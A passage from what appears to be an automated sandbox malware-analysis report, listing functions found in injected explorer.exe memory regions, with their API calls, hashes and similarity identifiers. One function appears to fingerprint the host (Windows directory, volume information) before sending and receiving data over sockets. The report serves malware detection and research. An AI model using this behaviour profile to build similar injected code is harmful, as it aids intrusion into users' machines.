                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9018F21B1AB4282EE099B6AB9443396361EB89FC4F09D136DE5B07B54DF3CC1818724
                                                                                                                                                                                                                                  Function 08A01125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 08A011AD
                                                                                                                                                                                                                                    • Part of subcall function 08A1BBE1: _FF_MSGBANNER.LIBCMT ref: 08A1BC11
                                                                                                                                                                                                                                    • Part of subcall function 08A1BBE1: _NMSG_WRITE.LIBCMT ref: 08A1BC1B
                                                                                                                                                                                                                                    • Part of subcall function 08A1BBE1: _callnewh.LIBCMT ref: 08A1BC4F
                                                                                                                                                                                                                                    • Part of subcall function 08A1BBE1: _errno.LIBCMT ref: 08A1BC5A
                                                                                                                                                                                                                                    • Part of subcall function 08A1BBE1: _errno.LIBCMT ref: 08A1BC65
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08A01544
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08A0154C
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08A01554
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08A0155D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2761444284-0
                                                                                                                                                                                                                                  • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction ID: f9c17bbbb5930c5c3c0de418108e868d2e96d1f3f7156c71a3e9cecf07641cd0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAD12231618B488FDB69EF28E8597AA77E1FB98301F10062ED44BC7650DF78D946CB81
                                                                                                                                                                                                                                  Function 0AE31125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0AE311AD
                                                                                                                                                                                                                                    • Part of subcall function 0AE4BBE1: _FF_MSGBANNER.LIBCMT ref: 0AE4BC11
                                                                                                                                                                                                                                    • Part of subcall function 0AE4BBE1: _NMSG_WRITE.LIBCMT ref: 0AE4BC1B
                                                                                                                                                                                                                                    • Part of subcall function 0AE4BBE1: _callnewh.LIBCMT ref: 0AE4BC4F
                                                                                                                                                                                                                                    • Part of subcall function 0AE4BBE1: _errno.LIBCMT ref: 0AE4BC5A
                                                                                                                                                                                                                                    • Part of subcall function 0AE4BBE1: _errno.LIBCMT ref: 0AE4BC65
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0AE31544
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0AE3154C
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0AE31554
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0AE3155D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2761444284-0
                                                                                                                                                                                                                                  • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction ID: f78a7958625df3e6a25b9597b84fe74e73f0df19172788e3d6dc299ca13028d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27D12131618B488FDB68EF28D8596AA77E5FB98305F10462EE44BC3251DF78D906CB81
                                                                                                                                                                                                                                  Function 0B2F1125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0B2F11AD
                                                                                                                                                                                                                                    • Part of subcall function 0B30BBE1: _FF_MSGBANNER.LIBCMT ref: 0B30BC11
                                                                                                                                                                                                                                    • Part of subcall function 0B30BBE1: _NMSG_WRITE.LIBCMT ref: 0B30BC1B
                                                                                                                                                                                                                                    • Part of subcall function 0B30BBE1: _callnewh.LIBCMT ref: 0B30BC4F
                                                                                                                                                                                                                                    • Part of subcall function 0B30BBE1: _errno.LIBCMT ref: 0B30BC5A
                                                                                                                                                                                                                                    • Part of subcall function 0B30BBE1: _errno.LIBCMT ref: 0B30BC65
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0B2F1544
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0B2F154C
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0B2F1554
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0B2F155D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2761444284-0
                                                                                                                                                                                                                                  • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction ID: afdaae02fe36e944a066d8dbc0f6b7d08d57463bad2a7061ac4accc6dba33461
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79D12331618B498FDB68EF28D8997AAB7E1FB98301F50062ED44BD7250DF74D906CB81
                                                                                                                                                                                                                                  Function 08A2F345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction ID: b0e1457119f1281e078096ed4af118fde0240e1c411417c1c36d25bd4b2bd741
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAE15675A00226CFCB34CF5CC980BA9B7B1FF48315F2941A9C805ABB56DB75E952CB90
                                                                                                                                                                                                                                  Function 0AE5F345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction ID: 2900c686ffbf132a05df49934dcd87ff51fd9f24d1b91ddfd2615fe2e56bbede
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8E17675E002168FCF24CF68D980AAAB7B1FF48318F2951A9DD05AB346D775E941CF90
                                                                                                                                                                                                                                  Function 0B31F345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction ID: bb42cad34ba2ad66a74f1d3a4e4b0330fc20b78a7a882f68898ef783e1af4ac6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E17875E00216CFCB28CF98C880BB9B7B9FF48314F2949A9C915AB356D735E951CB90
                                                                                                                                                                                                                                  Function 0E0FF298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 0DF4F298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 1021F298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 0E0EA2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 812771569-0
                                                                                                                                                                                                                                  • Opcode ID: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                                  • Instruction ID: 1987711cf83e0040f03bfc07e65b67559f78240a4701323ebb31bf21114d199b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E15B727067818BDB60DB26E9943AAB3B1F748B85F400869CB4A57F14EF7CD885CB40
                                                                                                                                                                                                                                  Function 0DF3A2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 812771569-0
                                                                                                                                                                                                                                  • Opcode ID: bd72915e342eb17227b8ff682739b4ad7a599079b99399dd9bdd7bf2ec0a713f
                                                                                                                                                                                                                                  • Instruction ID: 03589992400173f9a4cf93b5c05a9d0565922d85873317645a2d1da884f6ad08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd72915e342eb17227b8ff682739b4ad7a599079b99399dd9bdd7bf2ec0a713f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE16B3260574187DB20DB6AE99833A73A1FB45B85F02C42ACB8B87B64EF7CD444C750
                                                                                                                                                                                                                                  Function 1020A2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 812771569-0
                                                                                                                                                                                                                                  • Opcode ID: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                                  • Instruction ID: f4a45535935ea73e978eb2487c5227d573c1fc03a1491947ca7452c6ed8d33ab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E1BD7531174587DB20CF26E89835AB3B1F748B85F904625DA8A4BB18EFBCE895CB40
                                                                                                                                                                                                                                  Function 0E0EA0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4124047334-0
                                                                                                                                                                                                                                  • Opcode ID: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                                  • Instruction ID: 9a38d626b9ea471e835bf4450a0e56f48928ed6198d82d6689ee3af00df7b586
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5716E75706B8089EA449F12FD643AA77A1BB89BD1F448D75CE0A57B64EF3CC885C340
                                                                                                                                                                                                                                  Function 0DF3A0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4124047334-0
                                                                                                                                                                                                                                  • Opcode ID: 716d948569891237ecea57e4004c24a20d504f94926412f9b25c08f04a218a5d
                                                                                                                                                                                                                                  • Instruction ID: 658579438755a3d181832e2ae2930029bde7455b3f30eba5b49a3cfa54d2a021
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 716d948569891237ecea57e4004c24a20d504f94926412f9b25c08f04a218a5d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82716B61605B4286EA05DFAAE9543367361BB88BD1F05C53BCD4B87BA4EF3CC844C360
                                                                                                                                                                                                                                  Function 1020A0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4124047334-0
                                                                                                                                                                                                                                  • Opcode ID: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                                  • Instruction ID: f0201f8a0c3531a469792dc0b5bbcefedeb53ffbdc0f9b7926666cc40b3cf410
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D718A75201B4182EB04CF52E9A839A7361FB8DBD5F950526DD8A8F768EFBCC498C740
                                                                                                                                                                                                                                  Function 0E0EDED0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID: @vp$`:j
                                                                                                                                                                                                                                  • API String ID: 4099253644-1503013717
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: d2938695678b525441c93e56577a69bb52c5f880205335b050dc536c93653429
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3131F031215AC089FE59EB61E8A43E473A0EFD4B94F480E75DA2A27B60DF7DC884C311
                                                                                                                                                                                                                                  Function 1020DED0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID: V$Dj
                                                                                                                                                                                                                                  • API String ID: 4099253644-2996452201
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: 6daae84246c4bc316326a633894331da703f950041bab13cff755c21f90aee0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD313075706B4685EF04FF91E85D3A93320FF89B94F684611DC9A0BAA8DFBCC4E48610
                                                                                                                                                                                                                                  Function 0DF29200 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 0DF29248
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0DF29255
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0DF2928A
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DF2ED1C
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: GetVolumeInformationA.KERNEL32 ref: 0DF2ED66
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: wsprintfA.USER32 ref: 0DF2EDC7
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0DF292AD
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF292BD
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 0DF29354
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: send.WS2_32 ref: 0DF2729C
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: recv.WS2_32 ref: 0DF27303
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcmpiA.KERNEL32 ref: 0DF27363
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrlenA.KERNEL32 ref: 0DF27387
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: StrStrA.SHLWAPI ref: 0DF2739F
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcmpiA.KERNEL32 ref: 0DF273BE
